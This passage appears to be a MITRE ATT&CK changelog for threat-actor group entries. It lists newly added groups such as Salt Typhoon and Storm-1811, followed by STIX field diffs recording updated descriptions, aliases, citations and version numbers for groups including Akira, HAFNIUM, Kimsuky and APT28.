BlackByte is a ransomware threat actor operating since at least 2021. BlackByte is associated with several versions of ransomware also labeled BlackByte Ransomware. BlackByte ransomware operations initially used a common encryption key allowing for the development of a universal decryptor, but subsequent versions such as BlackByte 2.0 Ransomware use more robust encryption mechanisms. BlackByte is notable for operations targeting critical infrastructure entities among other targets across North America.(Citation: FBI BlackByte 2022)(Citation: Picus BlackByte 2022)(Citation: Symantec BlackByte 2022)(Citation: Microsoft BlackByte 2023)(Citation: Cisco BlackByte 2024)
[G1042] RedEcho
Current version: 1.0
Description:
RedEcho is a People’s Republic of China-related threat actor associated with long-running intrusions in Indian critical infrastructure entities. RedEcho overlaps with various other PRC-linked threat groups, such as APT41, and is linked to ShadowPad malware use through shared infrastructure.(Citation: RecordedFuture RedEcho 2021)(Citation: RecordedFuture RedEcho 2022)
[G1045] Salt Typhoon
Current version: 1.0
Description:
Salt Typhoon is a People's Republic of China (PRC) state-backed actor that has been active since at least 2019 and is responsible for numerous compromises of network infrastructure at major U.S. telecommunication and internet service providers (ISPs).(Citation: US Dept. of Treasury Salt Typhoon JAN 2025)(Citation: Cisco Salt Typhoon FEB 2025)
[G1041] Sea Turtle
Current version: 1.0
Description:
Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and for complex DNS-based intrusions in which the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof login portals and other applications for credential collection.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
[G1046] Storm-1811
Current version: 1.0
Description:
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)(Citation: RedCanary June Insights 2024)
[G1047] Velvet Ant
Current version: 1.0
Description:
Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero-day exploits.(Citation: Sygnia VelvetAnt 2024A)(Citation: Sygnia VelvetAnt 2024B)
Major Version Changes
[G1024] Akira
Current version: 2.0
Version changed from: 1.0 → 2.0
Old description: [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates multiple overlaps with and similarities to [Conti](https://attack.mitre.org/software/S0575) malware.(Citation: BushidoToken Akira 2023)
New description: [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates variants capable of targeting Windows or VMWare ESXi hypervisors and multiple overlaps with [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: BushidoToken Akira 2023)(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024)
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_contributors |  | ['Jiraput Thamsongkrah'] |

values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-03 10:32:50.221000+00:00 | 2025-03-11 15:36:38.244000+00:00 |
| description | [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates multiple overlaps with and similarities to [Conti](https://attack.mitre.org/software/S0575) malware.(Citation: BushidoToken Akira 2023) | [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates variants capable of targeting Windows or VMWare ESXi hypervisors and multiple overlaps with [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: BushidoToken Akira 2023)(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024) |
| x_mitre_version | 1.0 | 2.0 |

iterable_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| aliases |  | Howling Scorpius |
| external_references |  | {'source_name': 'Howling Scorpius', 'description': '(Citation: Palo Alto Howling Scorpius DEC 2024)'} |
| external_references |  | {'source_name': 'CISA Akira Ransomware APR 2024', 'description': 'CISA et al. (2024, April 18). #StopRansomware: Akira Ransomware. Retrieved December 10, 2024.', 'url': 'https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf'} |
| external_references |  | {'source_name': 'Cisco Akira Ransomware OCT 2024', 'description': 'Nutland, J. and Szeliga, M. (2024, October 21). Akira ransomware continues to evolve. Retrieved December 10, 2024.', 'url': 'https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/'} |
| external_references |  | {'source_name': 'Palo Alto Howling Scorpius DEC 2024', 'description': 'Zemah, Y. (2024, December 2). Threat Assessment: Howling Scorpius (Akira Ransomware). Retrieved January 8, 2025.', 'url': 'https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/'} |

[G0125] HAFNIUM
Current version: 3.0
Version changed from: 2.0 → 3.0
Old description: [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)
New description: [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. [HAFNIUM](https://attack.mitre.org/groups/G0125) has targeted remote management tools and cloud software for intial access and has demonstrated an ability to quickly operationalize exploits for identified vulnerabilities in edge devices.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: Microsoft Silk Typhoon MAR 2025)
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-01-08 20:45:37.568000+00:00 | 2025-03-25 18:04:13.368000+00:00 |
| description | [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021) | [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. [HAFNIUM](https://attack.mitre.org/groups/G0125) has targeted remote management tools and cloud software for intial access and has demonstrated an ability to quickly operationalize exploits for identified vulnerabilities in edge devices.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: Microsoft Silk Typhoon MAR 2025) |
| external_references[1]['description'] | (Citation: Microsoft Threat Actor Naming July 2023) | (Citation: Microsoft Threat Actor Naming July 2023)(Citation: Microsoft Silk Typhoon MAR 2025) |
| x_mitre_version | 2.0 | 3.0 |

iterable_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| external_references |  | {'source_name': 'Microsoft Silk Typhoon MAR 2025', 'description': 'Microsoft Threat Intelligence . (2025, March 5). Silk Typhoon targeting IT supply chain. Retrieved March 20, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/'} |

[G0030] Lotus Blossom
Current version: 4.0
Version changed from: 3.0 → 4.0
Old description: [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)
New description: [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, [Lotus Blossom](https://attack.mitre.org/groups/G0030) has also targeted entities such as digital certificate issuers.(Citation: Lotus Blossom Jun 2015)(Citation: Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025)
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-01-08 21:58:31.089000+00:00 | 2025-04-04 17:35:44.589000+00:00 |
| description | [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015) | [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, [Lotus Blossom](https://attack.mitre.org/groups/G0030) has also targeted entities such as digital certificate issuers.(Citation: Lotus Blossom Jun 2015)(Citation: Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025) |
| external_references[6]['description'] | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018. | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf | https://web.archive.org/web/20190508165226/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf |
| x_mitre_version | 3.0 | 4.0 |

iterable_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| aliases |  | Bilbug |
| aliases |  | Thrip |
| external_references |  | {'source_name': 'Thrip', 'description': '(Citation: Cisco LotusBlossom 2025)'} |
| external_references |  | {'source_name': 'Bilbug', 'description': '(Citation: Symantec Bilbug 2022)'} |
| external_references |  | {'source_name': 'Cisco LotusBlossom 2025', 'description': 'Joey Chen, Cisco Talos. (2025, February 27). Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools. Retrieved March 15, 2025.', 'url': 'https://blog.talosintelligence.com/lotus-blossom-espionage-group/'} |
| external_references |  | {'source_name': 'Symantec Bilbug 2022', 'description': 'Symntec Threat Hunter Team. (2022, November 12). Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries. Retrieved March 15, 2025.', 'url': 'https://www.security.com/threat-intelligence/espionage-asia-governments-cert-authority'} |

[G0049] OilRig
Current version: 5.0
Version changed from: 4.1 → 5.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-04 20:33:04.739000+00:00 | 2025-01-16 18:55:49.463000+00:00 |
| x_mitre_version | 4.1 | 5.0 |

iterable_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| aliases |  | Earth Simnavaz |
| aliases |  | Crambus |
| aliases |  | TA452 |
| external_references |  | {'source_name': 'TA452', 'description': '(Citation: Proofpoint Iranian Aligned Attacks JAN 2020)'} |
| external_references |  | {'source_name': 'Crambus', 'description': '(Citation: Symantec Crambus OCT 2023)'} |
| external_references |  | {'source_name': 'Earth Simnavaz', 'description': '(Citation: Trend Micro Earth Simnavaz October 2024)'} |
| external_references |  | {'source_name': 'Trend Micro Earth Simnavaz October 2024', 'description': 'Fahmy, M. et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html'} |
| external_references |  | {'source_name': 'Proofpoint Iranian Aligned Attacks JAN 2020', 'description': 'Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.', 'url': 'https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect'} |
| external_references |  | {'source_name': 'Symantec Crambus OCT 2023', 'description': 'Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.', 'url': 'https://www.security.com/threat-intelligence/crambus-middle-east-government'} |
| x_mitre_contributors |  | Jaesang Oh, KC7 Foundation |

Minor Version Changes
[G0007] APT28
Current version: 5.2
Version changed from: 5.1 → 5.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-10-10 14:31:01.968000+00:00 | 2025-03-10 20:15:06.958000+00:00 |
| external_references[22]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
| external_references[22]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
| external_references[33]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
| external_references[33]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
| x_mitre_version | 5.1 | 5.2 |

iterable_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| aliases |  | GruesomeLarch |
| external_references |  | {'source_name': 'GruesomeLarch', 'description': '(Citation: Nearest Neighbor Volexity)'} |
| external_references |  | {'source_name': 'Nearest Neighbor Volexity', 'description': 'Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.', 'url': 'https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/'} |

[G0016] APT29
Current version: 6.2
Version changed from: 6.1 → 6.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-03 18:48:32.299000+00:00 | 2025-04-04 17:07:43.344000+00:00 |
| x_mitre_version | 6.1 | 6.2 |

iterable_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_contributors |  | Vicky Ray, RayvenX |

[G0082] APT38
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
dictionary_item_added
| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_contributors |  | ['Hiroki Nagahama, NEC Corporation', 'Manikantan Srinivasan, NEC Corporation India', 'Pooja Natarajan, NEC Corporation India'] |

values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-08-26 16:33:33.984000+00:00 | 2025-01-22 21:54:11.727000+00:00 |
| external_references[11]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
| x_mitre_version | 3.0 | 3.1 |

[G1023] APT5
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-03-14 18:53:21.577000+00:00 | 2025-04-04 17:08:23.100000+00:00 |
| x_mitre_version | 1.0 | 1.1 |

[G1003] Ember Bear
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-09-06 21:43:44.941000+00:00 | 2024-12-03 20:19:38.721000+00:00 |
| x_mitre_version | 2.0 | 2.1 |

[G0004] Ke3chang
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-01-08 21:47:14.257000+00:00 | 2025-04-04 17:08:55.617000+00:00 |
| x_mitre_version | 3.0 | 3.1 |

[G0094] Kimsuky
Current version: 5.1
Version changed from: 5.0 → 5.1
Description diff (old → new): the description text is unchanged except that the new version appends a final sentence: In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) has used commercial large language models to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-10 14:32:27.067000+00:00 | 2025-01-29 21:17:48.165000+00:00 |
description | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the UN and the government, education, business services, and manufacturing sectors in the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean cyber espionage actors likely as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)
[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the UN and the government, education, business services, and manufacturing sectors in the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean cyber espionage actors likely as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)
[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) has used commercial large language models to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI) |
x_mitre_version | 5.0 | 5.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
aliases | | Springtail |
external_references | | {'source_name': 'Springtail', 'description': '(Citation: Symantec Troll Stealer 2024)'} |
external_references | | {'source_name': 'MSFT-AI', 'description': 'Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/'} |
external_references | | {'source_name': 'Symantec Troll Stealer 2024', 'description': 'Symantec Threat Hunter Team. (2024, May 16). Springtail: New Linux Backdoor Added to Toolkit. Retrieved January 17, 2025.', 'url': 'https://www.security.com/threat-intelligence/springtail-kimsuky-backdoor-espionage'} |
x_mitre_contributors | | Jaesang Oh, KC7 Foundation |
[G1004] LAPSUS$
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-11 21:51:11.405000+00:00 | 2025-04-07 14:44:59.715000+00:00 |
x_mitre_version | 2.0 | 2.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | mobile-attack |
[G0032] Lazarus Group
Current version: 4.1
Version changed from: 4.0 → 4.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 16:06:34.699000+00:00 | 2025-04-16 17:21:11.622000+00:00 |
x_mitre_version | 4.0 | 4.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | MyungUk Han, ASEC |
x_mitre_contributors | | Jun Hirata, NEC Corporation |
x_mitre_contributors | | Manikantan Srinivasan, NEC Corporation India |
x_mitre_contributors | | Pooja Natarajan, NEC Corporation India |
[G0065] Leviathan
Current version: 4.1
Version changed from: 4.0 → 4.1
Description diff (old → new): "Australia" is added to the list of targeted regions (now the US, Canada, Australia, Europe, the Middle East, and Southeast Asia) and the new version appends the citation (Citation: CISA Leviathan 2024); the rest of the text is unchanged.
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-08 20:33:16.460000+00:00 | 2025-02-03 21:55:54.314000+00:00 |
description | [Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018) | [Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA Leviathan 2024) |
x_mitre_version | 4.0 | 4.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'CISA Leviathan 2024', 'description': 'CISA et al. (2024, July 8). People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a'} |
[G0034] Sandworm Team
Current version: 4.2
Version changed from: 4.1 → 4.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 17:37:44.040000+00:00 | 2024-12-04 21:17:08.593000+00:00 |
x_mitre_version | 4.1 | 4.2 |
[G0128] ZIRCONIUM
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-10 14:32:51.085000+00:00 | 2025-04-04 17:09:39.718000+00:00 |
x_mitre_version | 2.1 | 2.2 |
Patches
[G1028] APT-C-23
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 15:31:48.747000+00:00 | 2024-11-17 20:01:55.806000+00:00 |
external_references[7]['description'] | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved March 4, 2024. | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved November 17, 2024. |
external_references[7]['url'] | https://web.archive.org/web/20231126111812/https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf | https://web.archive.org/web/20231126111812/https:/about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf |
[G0099] APT-C-36
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-05-26 20:17:53.085000+00:00 | 2025-04-16 20:37:39.643000+00:00 |
[G0006] APT1
Current version: 1.4
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-05-26 12:23:48.842000+00:00 | 2025-04-16 20:37:37.426000+00:00 |
[G0005] APT12
Current version: 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:44:59.268000+00:00 | 2025-04-16 20:37:37.119000+00:00 |
[G0023] APT16
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-26 23:33:26.354000+00:00 | 2025-04-16 20:37:41.686000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0025] APT17
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-04 17:04:35.669000+00:00 | 2024-11-17 15:03:54.769000+00:00 |
external_references[3]['description'] | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016. | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved November 17, 2024. |
[G0013] APT30
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-29 19:34:28.999000+00:00 | 2024-11-17 15:05:25.104000+00:00 |
external_references[2]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
[G0067] APT37
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-06-26 18:59:30.461000+00:00 | 2024-11-17 15:01:33.384000+00:00 |
external_references[10]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[10]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G1007] Aoqin Dragon
